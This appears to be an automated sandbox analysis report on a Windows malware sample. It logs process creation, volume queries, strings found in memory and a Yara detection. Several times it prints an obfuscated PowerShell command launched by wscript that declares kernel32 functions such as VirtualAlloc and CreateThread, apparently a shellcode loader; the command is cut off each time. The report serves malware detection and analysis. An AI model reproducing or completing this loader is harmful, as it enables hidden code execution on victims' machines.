Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$saudiarabiske = """koaeldmedpo-cetphysuplneph eg-frtfoycepspegrdteefafsairenspipltseiufoslnra je'drublsliiminingax ajsmoyteszatinenemug;spulesunisonungmu trspoyelsinthaekomtr.svrkiuhenhategisimkaesh.moicanpitoxeterstofeptesareefrskvfoishcgaebesfo;fopkoubabselstihoclv masafttrarutseibecad mecvelsaaxysausbr ostsehliwbuakorhutabnbeebesbusun1ce sa{tr[madanlomlspivemarpsuoseruttfr(st`"""peaundoovedastpunifo3nd2la.cudgelrulci`"""cl)bl]brpasuvibbolisiudcwa unsbetsuaimtafifucbi haeslxtotboetjrsunkt reivinsottu spgreeaftudsovelarudvcoivactieskkstesaycininawempreta(noinongrtco omnanotaymoicaspllma,griapnintal alssellagsptsm6pe9fo,biiurnbetpi kraisffifliainlpo,maibenmottr asbteagaglaany)ma;sc[sodchldelngigommiptiovarkutpa(sa`"""skgwhdboise3vi2pe`"""sn)ka]bepkrurabkllibifecsl fosbetadaartgrihvcem drehaxsatseeasrbrnda aaiafnlotov begnaesothjcamlrgibupsarmagconre(skibanrathe komekutalla,stiauncetet trgmagpyeunganufi)wo;ub[ubdcalexlstiromcipreocardyttr(se`"""cakdiesarsenplemalbi3tr2si`"""tr)be]jopbruyabsolauilacdi disljtskaemttuiovcbe aterexsttdreatrfonwe fliunnpattapsttverar saepinlsumemunshayabsdotasetumspldroadcvoasllstedksbawsa(rausviopnaltko mevpe1du,moiunnheter plvsn2ta)du;he[cadfolgylraiecmarpanobrrqutfe(li`"""sykbaeskravnkaemilsk3mo2de`"""di)fa]prpcoubebanlafihycun alshjthyadrtmiiuncpi ceestxkytkaealrkonac ariblncatse hugsilpsosebefapllemdmaesalheesatbreprasmtguofimun(puiaenfotdr teptrrtlede1to5sa1co)sk;ha[badevleultridemhopsaofarnottr(ca`"""akgpidplifi3sc2re`"""aa)da]sapekuapbtalreihacpr nosoptsrasktstisqcak eneaaxsptfoetardensp arisenovtbe flsfotenrunoaeksheboablntadpafgeisolanlblposaavtunhpr(diiddnartkl acekrtluhwiyunlhj8bl7du)bi;qu[nodkrlunlekiapmempsyoinrgltcy(sa`"""seumospeeafrpa3bl2in`"""ko)un]jrpdiurebsklnoisncsc spsfutstasetfaiklcme ueedexudtcoeunrjanst ininonfltrh grcinlskoinsbiepycdalsuimopetbenotaatarbedpa(ku)un;yn[chdagllrloticamcopsaoghrmatba(sp`"""pawtriarnresgapdeoanosplti.brdexrobvsp`"""un)dr]oppheuinbunlceicocst unssetceafotdiistcme stepaxwatlaebrrrenov paistncotru plsencluhteenodtrutaldaedrjmaoprbtr(beitynoltkl knufanafokovcoestrel2br2kl6re,ininonretko piamikwetstiwa)mu;dd[afdunlsllspivomrepnootrrchtol(cy`"""geaandprvegalipseifo3sp2re.rydovlajlre`"""do)st]typnaurabmelpoilocbu plsfitmiapatscipecta diestxbotdrehurmenal mlifanbltci trqmoufaeerraryvoshaekorkrvtsileckuefacudoafnprfliisughe(muifonpitho prrtheengofleseatrfi,liiinngrtfu opcenogasac0ti,baiminsttsh grddrispsdepreoovssu,coirintatin nonpearupunhleoer2ho7no)mo;un[indhalafluviafmcoppaospruntto(co`"""irwalisknmisovppeonooaalre.sldmorklvfo`"""st)se]copfoucrbbilopiskcsk kasovtblaantfriomcma unesuxenttrelyrdenbe veifonritca hadciouncgruremdremunwetsepfirslolippaevkrputiniteeensve(boiaanlitwo wifuvotarbesat,foivennitsa grlsuanonusgsorbeesi,foiyunmitou stsobkrerheisevtv,frigantetto buhghekamex,waialnantan messearhmerbduagrftu,seislnuntex morreesitspiau)fr;dr[whdamlrelku
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$saudiarabiske = """koaeldmedpo-cetphysuplneph eg-frtfoycepspegrdteefafsairenspipltseiufoslnra je'drublsliiminingax ajsmoyteszatinenemug;spulesunisonungmu trspoyelsinthaekomtr.svrkiuhenhategisimkaesh.moicanpitoxeterstofeptesareefrskvfoishcgaebesfo;fopkoubabselstihoclv masafttrarutseibecad mecvelsaaxysausbr ostsehliwbuakorhutabnbeebesbusun1ce sa{tr[madanlomlspivemarpsuoseruttfr(st`"""peaundoovedastpunifo3nd2la.cudgelrulci`"""cl)bl]brpasuvibbolisiudcwa unsbetsuaimtafifucbi haeslxtotboetjrsunkt reivinsottu spgreeaftudsovelarudvcoivactieskkstesaycininawempreta(noinongrtco omnanotaymoicaspllma,griapnintal alssellagsptsm6pe9fo,biiurnbetpi kraisffifliainlpo,maibenmottr asbteagaglaany)ma;sc[sodchldelngigommiptiovarkutpa(sa`"""skgwhdboise3vi2pe`"""sn)ka]bepkrurabkllibifecsl fosbetadaartgrihvcem drehaxsatseeasrbrnda aaiafnlotov begnaesothjcamlrgibupsarmagconre(skibanrathe komekutalla,stiauncetet trgmagpyeunganufi)wo;ub[ubdcalexlstiromcipreocardyttr(se`"""cakdiesarsenplemalbi3tr2si`"""tr)be]jopbruyabsolauilacdi disljtskaemttuiovcbe aterexsttdreatrfonwe fliunnpattapsttverar saepinlsumemunshayabsdotasetumspldroadcvoasllstedksbawsa(rausviopnaltko mevpe1du,moiunnheter plvsn2ta)du;he[cadfolgylraiecmarpanobrrqutfe(li`"""sykbaeskravnkaemilsk3mo2de`"""di)fa]prpcoubebanlafihycun alshjthyadrtmiiuncpi ceestxkytkaealrkonac ariblncatse hugsilpsosebefapllemdmaesalheesatbreprasmtguofimun(puiaenfotdr teptrrtlede1to5sa1co)sk;ha[badevleultridemhopsaofarnottr(ca`"""akgpidplifi3sc2re`"""aa)da]sapekuapbtalreihacpr nosoptsrasktstisqcak eneaaxsptfoetardensp arisenovtbe flsfotenrunoaeksheboablntadpafgeisolanlblposaavtunhpr(diiddnartkl acekrtluhwiyunlhj8bl7du)bi;qu[nodkrlunlekiapmempsyoinrgltcy(sa`"""seumospeeafrpa3bl2in`"""ko)un]jrpdiurebsklnoisncsc spsfutstasetfaiklcme ueedexudtcoeunrjanst ininonfltrh grcinlskoinsbiepycdalsuimopetbenotaatarbedpa(ku)un;yn[chdagllrloticamcopsaoghrmatba(sp`"""pawtriarnresgapdeoanosplti.brdexrobvsp`"""un)dr]oppheuinbunlceicocst unssetceafotdiistcme stepaxwatlaebrrrenov paistncotru plsencluhteenodtrutaldaedrjmaoprbtr(beitynoltkl knufanafokovcoestrel2br2kl6re,ininonretko piamikwetstiwa)mu;dd[afdunlsllspivomrepnootrrchtol(cy`"""geaandprvegalipseifo3sp2re.rydovlajlre`"""do)st]typnaurabmelpoilocbu plsfitmiapatscipecta diestxbotdrehurmenal mlifanbltci trqmoufaeerraryvoshaekorkrvtsileckuefacudoafnprfliisughe(muifonpitho prrtheengofleseatrfi,liiinngrtfu opcenogasac0ti,baiminsttsh grddrispsdepreoovssu,coirintatin nonpearupunhleoer2ho7no)mo;un[indhalafluviafmcoppaospruntto(co`"""irwalisknmisovppeonooaalre.sldmorklvfo`"""st)se]copfoucrbbilopiskcsk kasovtblaantfriomcma unesuxenttrelyrdenbe veifonritca hadciouncgruremdremunwetsepfirslolippaevkrputiniteeensve(boiaanlitwo wifuvotarbesat,foivennitsa grlsuanonusgsorbeesi,foiyunmitou stsobkrerheisevtv,frigantetto buhghekamex,waialnantan messearhmerbduagrftu,seislnuntex morreesitspiau)fr;dr[whdamlrelku			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DE.tmp" "c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP"	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

⊘No contacted IP infos

Source:

Binary string: ek8C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.pdb source: powershell.exe, 00000003.00000002.848043775.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp

Source: powershell.exe, 00000003.00000002.836596796.0000000002CE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.861091835.0000000007940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft.co
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.838609935.00000000047F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr 